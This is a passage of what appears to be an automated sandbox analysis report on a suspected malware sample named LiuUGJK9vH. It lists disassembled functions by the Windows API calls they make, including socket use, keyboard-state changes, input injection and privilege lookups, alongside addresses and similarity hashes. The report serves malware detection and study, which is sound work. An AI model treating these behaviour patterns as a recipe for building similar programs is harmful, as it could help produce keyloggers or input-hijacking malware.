                      • API ID: BuffCharLower$AllocVirtual_memmove
                      • String ID:
                      • API String ID: 3659485706-0
                      • Opcode ID: ab9ce05aaf7ef72e75967f5c2c9fbff63471ebc438e10ba653b3ae7d5a8a630c
                      • Instruction ID: 42d1ff19b42d4dd855f78dbf13e3d8c427035282adcdd002c13888698d5010eb
                      • Opcode Fuzzy Hash: ab9ce05aaf7ef72e75967f5c2c9fbff63471ebc438e10ba653b3ae7d5a8a630c
                      • Instruction Fuzzy Hash: 91C16A71604301DFC714DF29C48096ABBE4FF89318F148AAEF8999B352D734E946CB86
                      APIs
                      • CoInitialize.OLE32(00000000), ref: 004780C3
                      • CoUninitialize.OLE32 ref: 004780CE
                        • Part of subcall function 0045D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
                      • VariantInit.OLEAUT32(?), ref: 004780D9
                      • VariantClear.OLEAUT32(?), ref: 004783AA
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                      • String ID:
                      • API String ID: 780911581-0
                      • Opcode ID: 146b06d0ccda97621068481867dda55264d3b4f6e553a8e7a39d32f8a9431655
                      • Instruction ID: 8f3373c4a7a5232ad993fe33ba140746eecbff111afdbebb2f840ccc5d4b94f2
                      • Opcode Fuzzy Hash: 146b06d0ccda97621068481867dda55264d3b4f6e553a8e7a39d32f8a9431655
                      • Instruction Fuzzy Hash: 2CA17C756047019FCB10EF15C485B6AB7E4BF89758F04845EF999AB3A2CB38EC05CB4A
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Variant$AllocClearCopyInitString
                      • String ID:
                      • API String ID: 2808897238-0
                      • Opcode ID: 126b7732d1169b0daeb476a90690a6342f420379eaa699d7f5cc7697427e96b0
                      • Instruction ID: e8b204b61dde8909cc9ebe033208aa5324eaf332f6d31eb9d5c273134af525d6
                      • Opcode Fuzzy Hash: 126b7732d1169b0daeb476a90690a6342f420379eaa699d7f5cc7697427e96b0
                      • Instruction Fuzzy Hash: 9551C5747003019BDB20AF66D49162AB3E5AF45315F61C82FE986EB293DA38DC49870D
                      APIs
                      • socket.WSOCK32(00000002,00000002,00000011), ref: 004769D1
                      • WSAGetLastError.WSOCK32(00000000), ref: 004769E1
                        • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                        • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00476A45
                      • WSAGetLastError.WSOCK32(00000000), ref: 00476A51
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ErrorLast$__itow__swprintfsocket
                      • String ID:
                      • API String ID: 2214342067-0
                      • Opcode ID: 1f37f2b7fbf17e66587eba69bd49cf375ba60b11beb26db7d7c2f153f99e3f74
                      • Instruction ID: c17afa0f8bd668a9c60690327d1e2da2a99666ddae487d2dea1163d2ceff8f1e
                      • Opcode Fuzzy Hash: 1f37f2b7fbf17e66587eba69bd49cf375ba60b11beb26db7d7c2f153f99e3f74
                      • Instruction Fuzzy Hash: A241C175740200AFEB50BF25CC86F6A37A49F05B18F04C56EFA59AB3C3DA789D008B59
                      APIs
                      • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0048F910), ref: 004764A7
                      • _strlen.LIBCMT ref: 004764D9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: _strlen
                      • String ID:
                      • API String ID: 4218353326-0
                      • Opcode ID: 950d12a2ce6679dc4d89bdad0c15c89ad0c0cc2934a651e97078b378a34254de
                      • Instruction ID: ea6fe9a4da80eb7d3c3fcd9d99711482a179dafd9654a2bb84a00921c454041b
                      • Opcode Fuzzy Hash: 950d12a2ce6679dc4d89bdad0c15c89ad0c0cc2934a651e97078b378a34254de
                      • Instruction Fuzzy Hash: F341B971600104ABCB14EB65EC85EEEB7AAAF44314F51C16FF919A72D3DB38AD04CB58
                      APIs
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 02F9354C
                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 02F935D5
                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 02F935E7
                      • __freea.LIBCMT ref: 02F935F0
                        • Part of subcall function 02F932FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 02F9332C
                      Memory Dump Source
                      • Source File: 00000000.00000002.1481149798.0000000002F50000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F50000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_2f50000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                      • String ID:
                      • API String ID: 2652629310-0
                      • Opcode ID: e7c376159dde463744b13bef63d8b749db7005f3363a934d67400fba8110fabc
                      • Instruction ID: b36b6a2101437b6a10d23e623d7402384cee9b52ea81ebd59016f5fbb7cf1962
                      • Opcode Fuzzy Hash: e7c376159dde463744b13bef63d8b749db7005f3363a934d67400fba8110fabc
                      • Instruction Fuzzy Hash: B731D272E0020AABEF259F65DC44DAF7BA5EF44394F0541A9ED04D7250EB35C994CF90
                      APIs
                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004888DE
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: InvalidateRect
                      • String ID:
                      • API String ID: 634782764-0
                      • Opcode ID: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                      • Instruction ID: 90478ffdb7761b137305382920b909693c76b6b3f52a4c92a5928a084f4746aa
                      • Opcode Fuzzy Hash: dfc2a81b006da7d210676277332af1fb5d08ccb7ab45ec99ede0666f4995ae78
                      • Instruction Fuzzy Hash: FA31E574600109AEEB20BA18CC45FBE77A4FB09310FD4492FF911E62A1CB78A9409B5F
                      APIs
                      • ClientToScreen.USER32(?,?), ref: 0048AB60
                      • GetWindowRect.USER32(?,?), ref: 0048ABD6
                      • PtInRect.USER32(?,?,0048C014), ref: 0048ABE6
                      • MessageBeep.USER32(00000000), ref: 0048AC57
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Rect$BeepClientMessageScreenWindow
                      • String ID:
                      • API String ID: 1352109105-0
                      • Opcode ID: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                      • Instruction ID: 50dfaebed92d8c5328ac5b6136a8f20cc44f4ea80b7df437f97558f7e7d7bb38
                      • Opcode Fuzzy Hash: b992c4d65db1967464bf88d38174ccb0aa2b8d75632d23dd7873dfcfb3d19eff
                      • Instruction Fuzzy Hash: BA419130600118DFEB11EF58D884A6E7BF5FB48300F1888BBE9149B361D7B4E861CB5A
                      APIs
                      • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00460B27
                      • SetKeyboardState.USER32(00000080,?,00000001), ref: 00460B43
                      • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00460BA9
                      • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00460BFB
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: KeyboardState$InputMessagePostSend
                      • String ID:
                      • API String ID: 432972143-0
                      • Opcode ID: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                      • Instruction ID: 03210f4579a9838ef25ae451a3721c68a31d2690f75eb3d3b5678938ddfb0b3b
                      • Opcode Fuzzy Hash: ad743076a504700ecfcd0b291c1b9b7b7440be96a9dfed4adad831221a9f942d
                      • Instruction Fuzzy Hash: 65315970D402086EFB308AA98C05BFFBBA5AB45718F08826BE491512D2E37DA945975F
                      APIs
                      • GetKeyboardState.USER32(?,76C1C0D0,?,00008000), ref: 00460C66
                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00460C82
                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00460CE1
                      • SendInput.USER32(00000001,?,0000001C,76C1C0D0,?,00008000), ref: 00460D33
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: KeyboardState$InputMessagePostSend
                      • String ID:
                      • API String ID: 432972143-0
                      • Opcode ID: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                      • Instruction ID: af81f782b9f2afb763cf5164547ef1363043bc47ca8f91e08b3a13bd089ac861
                      • Opcode Fuzzy Hash: db42d93e8e195687caca85855f7745e2d87a2e1a1f23b639b912e2236a781201
                      • Instruction Fuzzy Hash: 963135309402086EFF388B658804BBFBB66EB45310F04472FE481622D1E33D9949D75B
                      APIs
                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004361FB
                      • __isleadbyte_l.LIBCMT ref: 00436229
                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00436257
                      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043628D
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                      • String ID:
                      • API String ID: 3058430110-0
                      • Opcode ID: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                      • Instruction ID: a268d3a3e6e94a3a382490fbdf87b59e774afa85b5b6ffc4d13239602402ad5c
                      • Opcode Fuzzy Hash: a60c1041aab017ddab1c5084f57e160f63eb243bd769fe5892fd9e0978686beb
                      • Instruction Fuzzy Hash: 8831E230600246BFDF219F65CC48B6B7BB9BF4A310F17906AE82487291DB34D850D754
                      APIs
                      • GetForegroundWindow.USER32 ref: 00484F02
                        • Part of subcall function 00463641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0046365B
                        • Part of subcall function 00463641: GetCurrentThreadId.KERNEL32 ref: 00463662
                        • Part of subcall function 00463641: AttachThreadInput.USER32(00000000,?,00465005), ref: 00463669
                      • GetCaretPos.USER32(?), ref: 00484F13
                      • ClientToScreen.USER32(00000000,?), ref: 00484F4E
                      • GetForegroundWindow.USER32 ref: 00484F54
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                      • String ID:
                      • API String ID: 2759813231-0
                      • Opcode ID: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
                      • Instruction ID: 1d2def75fb9c8d520c96e6582531674793c8a8545b0fc50cd96dbe06c6996e1e
                      • Opcode Fuzzy Hash: 66b1f3ac083da855331d928d4446481d114f1a3fb54dcb21d0b34bab5917c058
                      • Instruction Fuzzy Hash: 38314FB2D00108AFCB00EFA6C8819EFB7F9EF84304F00446EE515E7242EA759E058BA5
                      APIs
                        • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                      • GetCursorPos.USER32(?), ref: 0048C4D2
                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0043B9AB,?,?,?,?,?), ref: 0048C4E7
                      • GetCursorPos.USER32(?), ref: 0048C534
                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0043B9AB,?,?,?), ref: 0048C56E
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                      • String ID:
                      • API String ID: 2864067406-0
                      • Opcode ID: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                      • Instruction ID: 2973952025af683afbaf652597196eb0b77ee17814688135882e4792ee887bd6
                      • Opcode Fuzzy Hash: eaef0c60606744c236617b72f069d6ac48e9dc0c7f64b6eecf554375fb646ea5
                      • Instruction Fuzzy Hash: CE319335500028FFCF159F58C898EAF7BB5EB09310F44486AF9059B361C735AD50DBA8
                      APIs
                        • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                        • Part of subcall function 0045810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                        • Part of subcall function 0045810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                        • Part of subcall function 0045810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                        • Part of subcall function 0045810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 004586A3
                      • _memcmp.LIBCMT ref: 004586C6
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004586FC
                      • HeapFree.KERNEL32(00000000), ref: 00458703
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                      • String ID:
                      • API String ID: 1592001646-0
                      • Opcode ID: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                      • Instruction ID: 730e04a0c9a28b219d77ec22e6a84493cb1498a8cd35620125a6bebab32f77ad
                      • Opcode Fuzzy Hash: 2c5cbc444dc25df1d3482cf24a588846e82523edbc0970691195306e100f3dfe
                      • Instruction Fuzzy Hash: E4215A71E01109EBDB10DFA4C989BAEB7B8EF45306F15405EE844AB242DB34AE09CB58
                      APIs
                      • __setmode.LIBCMT ref: 004209AE
                        • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00467896,?,?,00000000), ref: 00405A2C
                        • Part of subcall function 00405A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00467896,?,?,00000000,?,?), ref: 00405A50
                      • _fprintf.LIBCMT ref: 004209E5
                      • OutputDebugStringW.KERNEL32(?), ref: 00455DBB
                        • Part of subcall function 00424AAA: _flsall.LIBCMT ref: 00424AC3
                      • __setmode.LIBCMT ref: 00420A1A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                      • String ID:
                      • API String ID: 521402451-0
                      • Opcode ID: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                      • Instruction ID: 506474fa098cb1490a8c63a0929ef03edd2b6c88ff5c0dc42923ee6bdce5b67a
                      • Opcode Fuzzy Hash: f8cbf8bec01b3a097d2808ee2000faaa12c69a290c37b152d83dab8e3784db7b
                      • Instruction Fuzzy Hash: E31126727041146FDB04B2A5BC469BE77A8DF81318FA0416FF105632C3EE3C5946879D
                      APIs
                      • _free.LIBCMT ref: 00435101
                        • Part of subcall function 0042571C: __FF_MSGBANNER.LIBCMT ref: 00425733
                        • Part of subcall function 0042571C: __NMSG_WRITE.LIBCMT ref: 0042573A
                        • Part of subcall function 0042571C: RtlAllocateHeap.NTDLL(00AA0000,00000000,00000001,?,00000000,00000001,?,00420DD3,?,00000000,%I,?,00409E8C,?,?,?), ref: 0042575F
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480376792.000000000051F000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480403836.0000000000526000.00000040.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_LiuUGJK9vH.jbxd
                      Similarity
                      • API ID: AllocateHeap_free
                      • String ID:
                      • API String ID: 614378929-0
                      • Opcode ID: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
                      • Instruction ID: 565aca9384bc55ec46628ce6f4316e74187f5c3bb682111b66b5609c454c8c26
                      • Opcode Fuzzy Hash: a8023bd45059f91bbc3ba768b53d43d26a35538f988b85c4c1a404ec765a44f4
                      • Instruction Fuzzy Hash: D411E072E01A21AECF313FB1BC05B5E3B989B183A5F50593FF9049A250DE3C89418B9C
                      APIs
                      • _memset.LIBCMT ref: 004044CF
                        • Part of subcall function 0040407C: _memset.LIBCMT ref: 004040FC
                        • Part of subcall function 0040407C: _wcscpy.LIBCMT ref: 00404150
                        • Part of subcall function 0040407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00404160
                      • KillTimer.USER32(?,00000001,?,?), ref: 00404524
                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00404533
                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0043D4B9
                      Memory Dump Source
                      • Source File: 00000000.00000002.1480203016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.1480173807.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480260793.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480312238.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1480336734.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
